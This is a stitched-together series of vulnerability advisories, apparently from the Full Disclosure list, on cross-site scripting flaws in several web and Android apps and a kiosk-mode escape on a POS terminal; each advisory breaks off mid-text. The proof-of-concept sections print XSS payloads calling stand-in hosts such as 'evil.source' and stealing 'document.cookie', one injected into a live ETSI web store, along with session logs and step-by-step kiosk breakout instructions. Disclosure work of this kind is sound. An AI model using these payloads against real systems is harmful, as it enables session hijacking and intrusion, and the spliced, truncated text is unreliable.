https://MALICIOUS-DOMAIN.com/gfx/logo-header.png";>" id="demo-hor-3" class="form-control">

--- PoC Session Logs (POST) ---
https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/
Host: assm_cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---280242453224137385302547344680
Content-Length: 902
Origin: https://assm_cms.localhost:8080
Connection: keep-alive
Referer: https://assm_cms.localhost:8080/shop/admin/manage_admin/
Cookie: ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; curr=1
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; path=/; HttpOnly
-
https://assm_cms.localhost:8080/shop/admin/manage_admin/
Host: assm_cms.localhost:8080
User-Agent: Mozilla
[FD] Tiva Events Calender v1.4 - Cross Site Scripting Vulnerability
Document Title:
===============
Tiva Events Calender v1.4 - Cross Site Scripting Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2276

Release Date:
=============
2023-07-05

Vulnerability Laboratory ID (VL-ID):
====================================
2276

Common Vulnerability Scoring System:
====================================
5

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Events Calendar For PHP is a powerful PHP calendar script that can be easily integrated and used with various PHP projects, such as scheduler, event handler, etc. The calendar is simple to install, deploy, and use. It is suitable for all types of service businesses to get online reservations without any hassles.

(Copy of the Homepage: https://codecanyon.net/item/tiva-events-calendar-for-php/19199337 )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent script code injection vulnerability in the Tiva Events Calender v1.4 web-application.

Affected Product(s):
====================
tiva_theme
Product: Tiva Events Calender - Calender PHP (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-04-03: Researcher Notification & Coordination (Security Researcher)
2021-04-04: Vendor Notification 1 (Security Department)
2021-06-24: Vendor Notification 2 (Security Department)
2021-07-13: Vendor Notification 3 (Security Department)
-**-**: Vendor Response/Feedback (Security Department)
-**-**: Vendor Fix/Patch (Service Developer Team)
-**-**: Security Acknowledgements (Security Department)
2023-07-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (User Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Tiva Events Calender v1.4 web-application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser to web-application requests from the application-side.

The vulnerability is located in the name input field and name parameter. Remote attackers with privileged user accounts are able to inject their own malicious script code as name. This results in a persistent execution of the script code in the backend on edit, but also in the frontend (index) where the event is displayed after the submit (save) via POST method request. In the same direction it is possible to inject malformed client-side executable script code in a GET request to trigger a non-persistent execution.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected frontend / backend application modules.

Request Method(s):
[+] POST / GET

Vulnerable Input(s):
[+] Name

Vulnerable Parameter(s):
[+] name

Affected Module(s):
[+] index.php (Frontend on Event Preview)
[+] edit.php (Backend on Edit ID)

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with a low privileged user account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Exploitation: Payload
%20"

Vulnerable Source: Frontend (Index)
8 9 event1"%20"10 111213 14

Vulnerable Source: Backend (Edit ID)
Edit File
Report successfully saved.
Name *
" required />

--- PoC Session Logs (POST) ---
https://tiva-cal.localhost:8080/admin/report/edit.php
Host: tiva-cal.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---249785717017581481612148649683
Content-Length: 745
Origin: https://tiva-cal.localhost:8080
Connection: keep-alive
Referer: https://tiva-cal.localhost:8080/admin/report/edit.php
Cookie: PHPSESSID=76gqk14e1s6cce40hfj11
name="%20%20"&type=1&time=20-08-2021&file=temp.txt&save=
-
POST: HTTP/2.0 200 OK
server: nginx
content-type: text/html
content-length: 1283
etag: "503-53ed12f4ca761"
accept-ranges: bytes
strict-transport-security: max-age=15768000; includeSubDomains
-
https://tiva-cal.localhost:8080/admin/report/evil.source
Host: tiva-cal.localhost:8080
User-Agent: Mozilla/5.0 (Wi
[FD] PaulPrinting CMS - (Search Delivery) Cross Site Scripting Vulnerability
Document Title:
===
PaulPrinting CMS - (Search Delivery) Cross Site Scripting Vulnerability

References (Source):
===
https://www.vulnerability-lab.com/get_content.php?id=2286

Release Date:
===
2023-07-17

Vulnerability Laboratory ID (VL-ID):
===
2286

Common Vulnerability Scoring System:
===
5.2

Vulnerability Class:
===
Cross Site Scripting - Non Persistent

Current Estimated Price:
===
500€ - 1.000€

Product & Service Introduction:
===
PaulPrinting is designed to be feature rich, easy to use and search engine friendly, with a modern design and a visually appealing interface.

(Copy of the Homepage: https://codecanyon.net/user/codepaul )

Abstract Advisory Information:
===
The vulnerability laboratory core research team discovered a non-persistent cross site scripting vulnerability in the PaulPrinting (v2018) cms web-application.

Vulnerability Disclosure Timeline:
===
2022-08-25: Researcher Notification & Coordination (Security Researcher)
2022-08-26: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
===
Published

Exploitation Technique:
===
Remote

Severity Level:
===
Medium

Authentication Type:
===
Open Authentication (Anonymous Privileges)

User Interaction:
===
Medium User Interaction

Disclosure Type:
===
Responsible Disclosure

Technical Details & Description:
===
A client-side cross site scripting vulnerability has been discovered in the official PaulPrinting (v2018) cms web-application.
Remote attackers are able to manipulate client-side requests by injecting malicious script code to compromise user session data.

The client-side cross site scripting web vulnerability is located in the search input field with the insecurely validated q parameter, affecting the delivery module.
Remote attackers are able to inject their own malicious script code into the search input to provoke a client-side script code execution without secure encoding. The request method to execute is GET and the attack vector is non-persistent.

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent manipulation of affected application modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] /account/delivery

Vulnerable Input(s):
[+] Search

Vulnerable Parameter(s):
[+] q

Affected Module(s):
[+] /account/delivery
[+] Delivery Contacts

Proof of Concept (PoC):
===
The non-persistent xss web vulnerability can be exploited by remote attackers with a low privileged user account and medium user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Example
https://codeawesome.in/printing/account/delivery?q=

PoC: Exploitation
https://codeawesome.in/printing/account/delivery?q=a";>

--- PoC Session Logs (GET) ---
https://codeawesome.in/printing/account/delivery?q=a";>
Host: codeawesome.in
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: member_login=1; member_id=123; session_id=25246428fe6e707a3be0e0ce54f0e5bf;
-
GET: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33

Vulnerable Source: (Search - delivery?q=)
https://codeawesome.in/printing/account/delivery"; class="btn btn-primary mt-4 mb-2 float-right"> ">

Security Risk:
===
The security risk of the cross site scripting web vulnerability with non-persistent attack vector is estimated as medium.

Credits & Authors:
===
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:
===
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do
[FD] Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities
Document Title:
===
Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities

References (Source):
===
https://www.vulnerability-lab.com/get_content.php?id=2317

Release Date:
===
2023-07-04

Vulnerability Laboratory ID (VL-ID):
===
2317

Common Vulnerability Scoring System:
===
5.1

Vulnerability Class:
===
Multiple

Current Estimated Price:
===
500€ - 1.000€

Product & Service Introduction:
===
Browse, download and stream individual files that are on your Android device, using a web browser via a WiFi connection. No more taking your phone apart to get the SD card out or grabbing your cable to access your camera pictures and copy across your favourite MP3s.

(Copy of the Homepage: https://play.google.com/store/apps/details?id=com.dooblou.WiFiFileExplorer )

Abstract Advisory Information:
===
The vulnerability laboratory core research team discovered multiple web vulnerabilities in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.

Affected Product(s):
===
Product Owner: dooblou
Product: Dooblou WiFi File Explorer v1.13.3 - (Android) (Framework) (Wifi) (Web-Application)

Vulnerability Disclosure Timeline:
===
2022-01-19: Researcher Notification & Coordination (Security Researcher)
2022-01-20: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-04: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
===
Published

Exploitation Technique:
===
Remote

Severity Level:
===
Medium

Authentication Type:
===
Restricted Authentication (Guest Privileges)

User Interaction:
===
Low User Interaction

Disclosure Type:
===
Independent Security Research

Technical Details & Description:
===
Multiple input validation web vulnerabilities have been discovered in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.
The vulnerabilities allow remote attackers to inject their own malicious script code with a non-persistent attack vector to compromise browser-to-web-application requests from the application side.

The vulnerabilities are located in the `search`, `order`, `download` and `mode` parameters. The content requested via a GET method request is insecurely validated and executes malicious script code. The attack vector is non-persistent and the request method to inject is GET. Attackers do not need to be authorized to perform an attack that executes malicious script code. The links can, for example, be included as a malformed upload to provoke an execution on viewing the front- & backend of the wifi explorer.

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent manipulation of affected application modules.

Proof of Concept (PoC):
===
The input validation web vulnerabilities can be exploited by remote attackers without a user account and with low user interaction.
For security demonstration or to reproduce the web vulnerabilities follow the provided information and steps below to continue.

PoC: Exploitation
http://localhost:8000/storage/emulated/0/Download/https://evil.source"; onmouseover=alert(document.domain)>PLEASE CLICK PATH TO RETURN INDEX
http://localhost:8000/storage/emulated/0/Download/?mode=31&search=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert%28document.domain%29%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX%3C%2Fa%3E&x=3&y=3
http://localhost:8000/storage/emulated/0/Download/?mode=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3
http://localhost:8000/storage/emulated/?order=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX

Vulnerable Sources: Execution Points
ERROR Cannot find file or directory! /storage/emulated/0/Download/https://evil.source"; onmouseover="alert(document.domain)">PLEASE CLICK USER PATH TO RETURN INDEX >> Back To Files >>
-
PLEASE CLICK PATH TO RETURN INDEX&search=a"> | PLEASE CLICK PATH TO RETURN INDEX&search=a"> | PLEASE CLICK PATH TO RETURN I
-
>"https://evil.source"; onmouseover=alert(document.domain)">');javascript:document.multiSelect.submit();" style="">Download
https://evil.source"; onmouseover=alert(document.domain)>');javascript:document.multiSelect.submit();" style="">Delete
Create Copy Zip Unzip
[FD] Webile v1.0.1 - Multiple Cross Site Web Vulnerabilities
Document Title:
===
Webile v1.0.1 - Multiple Cross Site Web Vulnerabilities

References (Source):
===
https://www.vulnerability-lab.com/get_content.php?id=2321

Release Date:
===
2023-07-03

Vulnerability Laboratory ID (VL-ID):
===
2321

Common Vulnerability Scoring System:
===
5.5

Vulnerability Class:
===
Cross Site Scripting - Persistent

Current Estimated Price:
===
500€ - 1.000€

Product & Service Introduction:
===
Webile is a local area network cross-platform file management tool based on the http protocol. Using the personal mobile phone as a server in the local area network, it supports browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data, file statistics, displaying performance, etc. No need to connect to the Internet: you can browse files, send data, play videos and use other functions through a WiFi LAN or mobile phone hotspot, and no additional data traffic is generated during data transmission. Supports Mac, Windows, Linux, iOS, Android and other multi-platform operating systems.

(Copy of the Homepage: https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US )

Abstract Advisory Information:
===
The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 Wifi mobile android web application.

Affected Product(s):
===
Product Owner: Webile
Product: Webile v1.0.1 - (Framework) (Mobile Web-Application)

Vulnerability Disclosure Timeline:
===
2022-10-11: Researcher Notification & Coordination (Security Researcher)
2022-10-12: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-03: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
===
Published

Exploitation Technique:
===
Remote

Severity Level:
===
Medium

Authentication Type:
===
Restricted Authentication (Guest Privileges)

User Interaction:
===
Low User Interaction

Disclosure Type:
===
Independent Security Research

Technical Details & Description:
===
Multiple persistent input validation web vulnerabilities have been discovered in the Webile v1.0.1 Wifi mobile android web application.
The vulnerabilities allow remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser-to-web-application requests from the application side.

The persistent input validation web vulnerabilities are located in the send and add functions. Remote attackers are able to inject their own malicious script code into the new_file_name and i parameters of a POST method request to provoke a persistent execution of the malformed content.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Parameter(s):
[+] new_file_name
[+] i

Proof of Concept (PoC):
===
The persistent input validation web vulnerabilities can be exploited by remote attackers without a user account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Vulnerable Source: Send
Send message to phone
listing Message 20:10:11title="Copy" onclick="copy(1658081411827)"> test2"
history logs messages
Message Date Action
test2" 2022/07/17 20:10

--- PoC Session Logs #1 (POST) --- (Add)
http://localhost:8080/file_action
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 210
Origin: http://localhost:8080
Connection: keep-alive
Referer: http://localhost:8080/webile_files
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>""}
-
POST: HTTP/1.1 200 OK
Content-Type: application/json
Connection: keep-alive
Content-Encoding: gzip
Transfer-Encoding: chunked
-
http://localhost:8080/evil.source
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+
[FD] Aures Booking & POS Terminal - Local Privilege Escalation Vulnerability
Document Title:
===
Aures Booking & POS Terminal - Local Privilege Escalation Vulnerability

References (Source):
===
https://www.vulnerability-lab.com/get_content.php?id=2323

Release Date:
===
2023-07-17

Vulnerability Laboratory ID (VL-ID):
===
2323

Common Vulnerability Scoring System:
===
7.2

Vulnerability Class:
===
Privilege Escalation

Current Estimated Price:
===
3.000€ - 4.000€

Product & Service Introduction:
===
KOMET is an interactive, multifunctional kiosk specially designed for the fast food industry. Available as a wall-mounted or freestanding model, its design is especially adapted to foodservice such as take-aways or fast food in system catering. The kiosk features a 27 YUNO touch system in portrait mode, an ODP 444 thermal receipt printer, a payment terminal and a 2D barcode scanner. With a click, the customer selects, books, orders, purchases and pays directly at the kiosk. The system offers the possibility to manage customer cards and promotions. Queue management can also be optimized.

(Copy of the Homepage: https://aures.com/de/komet/ )

Abstract Advisory Information:
===
The vulnerability laboratory core research team discovered a local kiosk privilege escalation vulnerability in the operating system of the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the German company immergrün franchise gmbh.

Affected Product(s):
===
Aures Technologies GmbH
Product: Aures Komet Booking & POS Terminal - (KIOSK) (Windows 10 IoT Enterprise)

Vulnerability Disclosure Timeline:
===
2023-05-09: Researcher Notification & Coordination (Security Researcher)
2023-07-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
===
Published

Exploitation Technique:
===
Local

Severity Level:
===
High

Authentication Type:
===
Open Authentication (Anonymous Privileges)

User Interaction:
===
No User Interaction

Disclosure Type:
===
Responsible Disclosure

Technical Details & Description:
===
A kiosk mode escalation vulnerability has been discovered in the operating system of the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the German company immergrün franchise gmbh.
The security vulnerability allows local attackers to bypass the kiosk mode to compromise the local file system and applications.

It is possible for local attackers to escalate out of the kiosk mode of the aures komet booking & pos terminal. Local attackers are able to use the touch functionality of the aures komet booking & pos terminal system to escalate to higher privileges. The security vulnerability is located in the context menu function of the extended menu on touch interaction. Attackers with restricted, low local privileged access to the booking service front display are able to execute files, download content without restriction or exfiltrate local file-system information of the compromised windows based operating system. No keyboard or connections are required to manipulate the service booking and payment terminal. The booking and payment terminal system vulnerability requires no user interaction to be exploited and can only be triggered by local physical device access.

Vulnerable Operating System(s):
[+] Windows 10 (IoT Enterprise)

Affected Component(s):
[+] Context Menu

Affected Function(s):
[+] Web Search
[+] Share (Teilen)

Proof of Concept (PoC):
===
The local vulnerability can be exploited by local attackers with physical device access without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Sheet
Touch Display => Select Food Item => Highlight Text => Open Context Menu => Extend Context Menu => Web-Search => Browser => Local File System => Compromised!

Manual steps to reproduce the vulnerability ...
01. First touch the monitor display to move on from standby
02. Select a food item from the menu of immergrün (we recommend the cesar wraps)
03. Push the information button of the selected food item
04. Push twice via touch to mark the selected food item text
05. Press a third time after you have marked the context by holding it down on the touch display
06. Now the function context menu of the operating system for highlighted text appears
07. On the context menu, 3 dots appear to extend the visible function menu
08. Select the web-search or share function for the highlighted content in the context menu
09. The browser of the operating system opens on the main front screen
10.1 By now you are able to download an execute executab
[FD] PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities
Document Title:
===
PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities

References (Source):
===
https://www.vulnerability-lab.com/get_content.php?id=2285

Release Date:
===
2023-07-19

Vulnerability Laboratory ID (VL-ID):
===
2285

Common Vulnerability Scoring System:
===
5.8

Vulnerability Class:
===
Cross Site Scripting - Persistent

Current Estimated Price:
===
500€ - 1.000€

Product & Service Introduction:
===
PaulPrinting is designed to be feature rich, easy to use and search engine friendly, with a modern design and a visually appealing interface.

(Copy of the Homepage: https://codecanyon.net/user/codepaul )

Abstract Advisory Information:
===
The vulnerability laboratory core research team discovered multiple persistent cross site scripting vulnerabilities in the PaulPrinting (v2018) cms web-application.

Affected Product(s):
===
CodePaul
Product: PaulPrinting (2018) - CMS (Web-Application)

Vulnerability Disclosure Timeline:
===
2022-08-25: Researcher Notification & Coordination (Security Researcher)
2022-08-26: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-19: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
===
Published

Exploitation Technique:
===
Remote

Severity Level:
===
Medium

Authentication Type:
===
Restricted Authentication (User Privileges)

User Interaction:
===
Low User Interaction

Disclosure Type:
===
Responsible Disclosure

Technical Details & Description:
===
Multiple persistent input validation vulnerabilities have been discovered in the official PaulPrinting (v2018) cms web-application.
The vulnerabilities allow remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser-to-web-application requests from the application side.

The first vulnerability is located in the register module. Remote attackers are able to register a user account with malicious script code. After the registration the attacker provokes an execution of the malformed scripts on review of the settings, or when admins review the user in the backend (listing).

The second vulnerability is located in the delivery module. Remote attackers with low privileged user accounts are able to inject their own malicious script code into the contact details. This allows an execution on each interaction with users, or when admins review the entry in the backend (listing).

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /printing/register
[+] /account/delivery

Vulnerable Input(s):
[+] First name
[+] Last name
[+] Address
[+] City
[+] State

Vulnerable Parameter(s):
[+] firstname
[+] lastname
[+] address
[+] city
[+] state

Affected Module(s):
[+] Frontend Settings (./printing/account/setting)
[+] Frontend Delivery Address (./printing/account/delivery)
[+] Backend User Preview Listing
[+] Backend Delivery Address Contact Review

Proof of Concept (PoC):
===
The persistent input validation web vulnerabilities can be exploited by remote attackers with a low privileged user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Open your browser and start an http session tamper
2. Register in the application by clicking register on the login page
3. Inject your test payload into the marked vulnerable input fields
4. Save the entry by submitting via POST method
5. Login to the account and preview the settings
Note: Administrators in the backend have the same wrongly validated context that executes on preview of users
6. The script code executes on preview of the profile - settings
7. Successful reproduce of the first vulnerability!
8. Follow up by opening the Delivery address module
9. Add a contact and add your test payload in the same marked vulnerable input fields
Note: The script code executes on each review of the address in the backend or user frontend
10. Successful reproduce of the second vulnerability!

Exploitation: Payload
" "

--- PoC Session Logs (POST) ---
https://paulprinting.localhost:8000/printing/account/setting
Host: paulprinting.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: applica
[FD] ETSI WEBstore 2023 - Persistent Cross Site Scripting Web Vulnerability
Document Title:
===
ETSI WEBstore 2023 - Persistent Cross Site Scripting Web Vulnerability

References (Source):
===
https://www.vulnerability-lab.com/get_content.php?id=2327

Release Date:
===
2023-07-26

Vulnerability Laboratory ID (VL-ID):
===
2327

Common Vulnerability Scoring System:
===
4.6

Vulnerability Class:
===
Cross Site Scripting - Persistent

Current Estimated Price:
===
1.000€ - 2.000€

Abstract Advisory Information:
===
The vulnerability laboratory core research team discovered a persistent web vulnerability in the ETSI WebStore web-application.

Affected Product(s):
===
European Telecommunications Standards Institute (ETSI)
Product: WEBstore 2023 - User Management (Web-Application)

Vulnerability Disclosure Timeline:
===
2023-07-26: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
===
Published

Exploitation Technique:
===
Remote

Severity Level:
===
Medium

Authentication Type:
===
Restricted Authentication (User Privileges)

User Interaction:
===
Low User Interaction

Disclosure Type:
===
Independent Security Research

Technical Details & Description:
===
A persistent input validation web vulnerability has been discovered in the official ETSI Webstore 2023 web-application.
The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser-to-web-application requests from the application side.

The vulnerability is located in all input fields of the NewOrModifyCustomer.asp registration / modify form. Remote attackers are able to inject their own malicious script code with a persistent attack vector by injecting into the wrongly sanitized input fields. The injection point is the registration or modify form of the webstore. The execution points are located in the index, listarticle, myprofiles and user backend listing of the webstore web-application service.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Input(s):
[+] first name
[+] last name
[+] company name
[+] address

Affected Module(s):
[+] MyProfile
[+] ListArticle
[+] ShowCustomer

Proof of Concept (PoC):
===
The persistent input validation web vulnerability can be exploited by remote attackers with a low privileged user account and low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Register an account for the etsi webstore using the registration form
2. Inject script code payloads into the firstname, lastname, companyname and address input fields
3. Save the account by submitting via POST method request
4. Confirm the email and log on to the account
Note: After the login the execution takes place in the header where the user data is shown, as well as in separate pages where address data is displayed. On preview of the customer in the backend an execution of the malicious payload takes place as well.
5. Successful reproduce of the persistent web vulnerability!

--- PoC Session Logs (POST) [Inject & Execute] ---
https://webstore.etsi.org/ecommerce/ShowHideCustomer.asp
Host: webstore.etsi.org
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 906
Origin: https://webstore.etsi.org
Connection: keep-alive
Referer: https://webstore.etsi.org/ecommerce/NewOrModifyCustomer.asp
Cookie: list=2; _ga_L34WJL1P2Z=GS1.1.1690359581.2.1.1690359631.0.0.0; _ga=GA1.1.1806199158.1690355803; ASPSESSIONIDSWABCBBQ=IHBHHHFAJLDMIDCJINGNGIIK
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
NewOrExisting=NEW&eMail=tamm...@protonmail.com&password=cryptoag2&Company=A">https://shorturl.at/uFGNV onload=alert('TEA1-2-3-4')>&ClientCode=&ClientCodeCSA3=,&Fname=B">https://shorturl.at/uFGNV onload=alert('TEA1-2-3-4')>&member_orga_id=16173&Lname=C">https://shorturl.at/uFGNV onload=alert('TEA1-2-3-4')>&Address1=D">https://shorturl.&PostalCode=51221&Address2=E";>https://shorturl.&City=Bremen";>https://shorturl.at/uFGNV onload=alert('TEA1-2-3-4')>&Address3=F">https://shorturl.&Country=ALALBANIA&Phone=234534654364&Fax=&VATID=&FORM_DISCLAIMER=on&FORM_CAPTCHA=S430Q2&Submit=Submit
-
POST: HTTP/2.0
[FD] Simplephpscripts Simple CMS v2.1 - XSS Web Vulnerability
Document Title:
===
Simplephpscripts Simple CMS v2.1 - XSS Web Vulnerability

References (Source):
===
https://www.vulnerability-lab.com/get_content.php?id=2301

Release Date:
===
2021-10-18

Vulnerability Laboratory ID (VL-ID):
===
2301

Common Vulnerability Scoring System:
===
5.1

Vulnerability Class:
===
Cross Site Scripting - Non Persistent

Current Estimated Price:
===
500€ - 1.000€

Product & Service Introduction:
===
The system can only be used in already existing websites to control their page sections and contents. Just paste a single line of code on your web page section and start controlling it through the admin area. Very simple installation - one step installation wizard. Option to include contents into web page sections through php include, javascript or iframe embed. Any language support. WYSIWYG (text) editor for styling and formatting the contents of the sections. Suitable for web designers who work with Mobirise, Xara and other web builders.

(Copy of the Homepage: https://simplephpscripts.com/simple-cms-php )

Abstract Advisory Information:
===
The vulnerability laboratory core research team discovered a non-persistent cross site scripting vulnerability in the Simplephpscripts Simple CMS v2.1 web-application.

Affected Product(s):
===
Simplephpscripts
Product: Simple CMS v2.1 - Content Management System (Web-Application)

Vulnerability Disclosure Timeline:
===
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2021-10-01: Vendor Response/Feedback (Security Department)
2021-10-02: Vendor Fix/Patch (Service Developer Team)
2021-10-10: Security Acknowledgements (Security Department)
2021-11-18: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
===
Published

Exploitation Technique:
===
Remote

Severity Level:
===
Medium

Authentication Type:
===
Pre Auth (No Privileges or Session)

User Interaction:
===
Low User Interaction

Disclosure Type:
===
Responsible Disclosure

Technical Details & Description:
===
A non-persistent cross site scripting vulnerability has been discovered in the official Simplephpscripts Simple CMS v2.1 web-application.
The vulnerability allows remote attackers to inject their own malicious script code with a non-persistent attack vector to compromise browser-to-web-application requests on the client side.

The cross site scripting vulnerability is located in the `id` parameter of the preview.php file. The request method to inject the malicious script code is GET and the attack vector of the vulnerability is non-persistent. The execution of the script code occurs in the output message of the undefined exception handling.

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent manipulation of affected application modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] Preview (Pages)

Vulnerable File(s):
[+] preview.php

Vulnerable Parameter(s):
[+] id

Affected Module(s):
[+] Undefined Exception-Handling (Preview)

Proof of Concept (PoC):
===
The non-persistent web vulnerability can be exploited by remote attackers without a user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Payload
-1%3E%22%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E

PoC: Exploitation
https://simple-cms.localhost:8000/simplecms/preview.php?id=-1%3E%22%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E

Vulnerable Source: preview.php (Exception-Handling)
Simple CMS page -1>"
https://simple-cms.localhost:8000/simplecms/lightbox/js/jquery-1.11.0.min.js";>
https://simple-cms.localhost:8000/simplecms/lightbox/js/lightbox.min.js";>
https://simple-cms.localhost:8000/simplecms/lightbox/css/lightbox.css"; rel="stylesheet" />
No page content with id -1>"

--- PoC Session Logs (GET) ---
https://simple-cms.localhost:8000/simplecms/preview.php?id=-1>"
Host: simple-cms.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: PHPSESSID=2emae9mm1m1misttrp1a3e1p21
-
GET: HTTP/2.0 200 OK
server: Apache
content-length: 1658
content-type: text/html; charset=UTF-8
